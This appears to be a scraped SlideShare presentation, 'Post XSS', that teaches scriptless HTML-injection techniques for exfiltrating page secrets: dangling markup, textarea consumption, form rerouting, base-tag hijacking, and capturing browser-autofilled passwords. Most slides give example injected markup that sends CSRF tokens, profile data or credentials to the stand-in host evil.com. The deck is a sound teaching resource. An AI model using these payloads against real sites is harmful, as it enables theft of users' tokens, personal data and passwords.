*www.Instaqube.com
** Type of injection attack, in which malicious scripts are injected into  otherwise benign and trusted web sites.* Occur ...
*       * XSS should be tested in anything that accepts user input and         displays it in the webpage, after rendering...
** What ?    * Very Similar to the XSS.* Why POST XSS?    * Browser-level efforts to improve the security of web applicati...
** Goals of a successful XSS attack is the extraction of user-specific  secrets from the vulnerable application.* Historic...
**Dangling markup injection*<textarea>-based consumption*Rerouting of existing forms*Use of <base> to hijack relative URLs...
* * Injection of non-terminated markup which will consume a significant    portion of the subsequent HTML syntax, until th...
*          *Limitation : Injection point to appear            before the sensitive data to be extracted          *If gover...
*    * Previous method had some limitation like matching quote character.    * Injection of a text area.    * Scenario: If...
*           * Limitation : In contrast to the previous method, a             degree of user interaction is needed to exfil...
*  * This works because <form> tag cannot be nested.  * Scenario : If we can inject any thing on top of a existing form ta...
*         *Interesting when used to target forms           automatically populated with user-specific           secrets. ...
*     * Injection of <base> tags.     * Able to change the semantics of all subsequently appearing relative       URLs.   ...
*         * Browsers have features to remember username and password           for websites.         * Browsers auto fill ...
*           * We can specify GET instead of POST and submit             the credentials to a selected same-site           ...
*    * All our previous vector redirects to the attacker domain.    * If the developer wishes to restrict the set of permi...
*  * Example :      * <form action=/post_review.php>            <input type=hidden name=review_body value=" ← Injected lin...
*           * http://lcamtuf.coredump.cx/postxss/www.Instaqube.com
Thank You               Q&Awww.Instaqube.com
Upcoming SlideShare
Loading in …5
×

Post XSS

546 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
546
On SlideShare
0
From Embeds
0
Number of Embeds
29
Actions
Shares
0
Downloads
13
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Post XSS

  1. 1. *www.Instaqube.com
  2. 2. ** Type of injection attack, in which malicious scripts are injected into otherwise benign and trusted web sites.* Occur when an attacker uses a web application to send malicious code generally in the form of a client side script, to a different end user.* Flaws that allow these attacks to succeed are prevalent in most web application that utilize user input and generate output without adequate validation or encoding of user input.* An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to determining that the script should not be trusted, and will execute the script.* Thus giving the malicious script access to cookies, and other sensitive information retained by the browser for use by the site. These scripts can also rewrite the HTML content.www.Instaqube.com
  3. 3. * * XSS should be tested in anything that accepts user input and displays it in the webpage, after rendering it. XSS attacks are successful because most programmers do not apply HTML encoding to the user input, trusting the user input as received. * E.g.: If a user enters “<script>alert (document. Cookie)</script>” in a text filed which upon submission may be rendered as a script tag thus producing a popup alert message with the cookies. * There are plenty of other XSS vectors and information about XSS which you can find out at OWASP.www.Instaqube.com
  4. 4. ** What ? * Very Similar to the XSS.* Why POST XSS? * Browser-level efforts to improve the security of web applications focuses on the containment of attacker-originating scripts. * Content Security Policy, removes the ability to inline JavaScript code in a protected HTML document. * Whitelisting of permissible sources for any externally-loaded scripts. * Related approaches, such as the No Script add-on, the built-in XSS filters in Internet Explorer and Chrome, client-side APIs such as toStaticHTML(...), or the HTML sanitizers built into server-side frameworks, also deserve a note.www.Instaqube.com
  5. 5. ** Goals of a successful XSS attack is the extraction of user-specific secrets from the vulnerable application.* Historically, XSS exploits sought to obtain HTTP (session) cookies.* The introduction of httponly cookies greatly limited this possibility.* In an application where theft of HTTP cookies is not practical, exfiltration attempts are usually geared towards the extraction of any of the following: * Personal Data * Tokens used to defend against cross-site request forgery attacks. * Capability-bearing URLswww.Instaqube.com
  6. 6. **Dangling markup injection*<textarea>-based consumption*Rerouting of existing forms*Use of <base> to hijack relative URLs*Form injection to intercept browser-managed passwords*The limits of exfiltration defenseswww.Instaqube.com
  7. 7. * * Injection of non-terminated markup which will consume a significant portion of the subsequent HTML syntax, until the expected terminating sequence is encountered.• Opposite quote.• Scenario : If we are allowed to inject anything in the HTML content above the sensitive data which we need to steal. * Example : * <img src=http://evil.com/log.cgi? ← Injected line with a non-terminated parameter ... <input type="hidden" name="xsrf_token" value="12345"> ... ← Normally- occurring apostrophe in page text ... </div>www.Instaqube.com
  8. 8. * *Limitation : Injection point to appear before the sensitive data to be extracted *If governed by pure chance, this condition will be met in 50% of all cases. *Demo : Dangling Markup Injectionwww.Instaqube.com
  9. 9. * * Previous method had some limitation like matching quote character. * Injection of a text area. * Scenario: If there is combination of single and quote present before the sensitive data which we want to steal. * Can be injected before or after the legitimate form tag. * Example : * <form action=http://evil.com/log.cgi><textarea> ← Injected line ... <input type="hidden" name="xsrf_token" value=‘12345’> ... (EOF)www.Instaqube.com
  10. 10. * * Limitation : In contrast to the previous method, a degree of user interaction is needed to exfiltrate the data. * Victim has to submit the form by some means. * Forms with auto-submit capabilities are being considered for HTML5. Such a feature may unintentionally assist with the automation of this attack in future browsers. * Demo : <textarea>-based consumptionwww.Instaqube.com
  11. 11. * * This works because <form> tag cannot be nested. * Scenario : If we can inject any thing on top of a existing form tag. * This allows the attacker to change the action URL to which any existing form will be submitted. * Example : * <form action=http://evil.com/log.cgi> ← Injected line ... <form action=update_profile.php> ← Legitimate, pre-existing form ... <input type="text" name="real_name" value="John Q. Public"> ... </form>www.Instaqube.com
  12. 12. * *Interesting when used to target forms automatically populated with user-specific secrets.  *Demo : Rerouting of existing formswww.Instaqube.com
  13. 13. * * Injection of <base> tags. * Able to change the semantics of all subsequently appearing relative URLs. * Scenario: If we are allowed to insert on the top of the form element. * Example : * <base href=http://evil.com/> ← Injected line ... <form action=update_profile.php> ← Legitimate, pre-existing form <form action=http://evil.com/update_profile.php> ... <input type="text" name="real_name" value="John Q. Public"> ... </form>www.Instaqube.com
  14. 14. * * Browsers have features to remember username and password for websites. * Browsers auto fill the fields after matching the domain, id and name parameters of the fields. * We can inject a form into a domain using previous exfiltration techniques, to steal the user credentials. * Example : * <form action="http://www.evil.com" method="POST"> <input type="text" id="username" name="username"> <input type="password" id="password" name="password"> </form> www.Instaqube.com
  15. 15. * * We can specify GET instead of POST and submit the credentials to a selected same-site destination. * That destination may links to third-party sites (thus leaking the credentials in the Referer header). * Or echo the parameter in the page.www.Instaqube.com
  16. 16. * * All our previous vector redirects to the attacker domain. * If the developer wishes to restrict the set of permissible destinations for markup such as <form>, <a href=...>, or <img> to his own domain. * However, any attempts to prevent exfiltration, even in script-less environments, are unlikely to be successful. * Exfiltration attempts do not have to be geared toward relaying the data to a third-party website. * Moving data from private place to public place all within the scope of a single website is also sufficient.www.Instaqube.com
  17. 17. * * Example : * <form action=/post_review.php> <input type=hidden name=review_body value=" ← Injected lines ... Your current shipping address: ← Existing page text to be exfiltrated 123 Evergreen Terrace Springfield, USA ... <form action="/update_address.php"> ← Existing form (ignored by the parser) ... <input type="hidden" name="xsrf_token" value="12345"> ← Token valid for /update_address.php and /post_review.php ... </form> • Demo : Addendum: The limits of exfiltration defenseswww.Instaqube.com
  18. 18. * * http://lcamtuf.coredump.cx/postxss/www.Instaqube.com
  19. 19. Thank You Q&Awww.Instaqube.com

×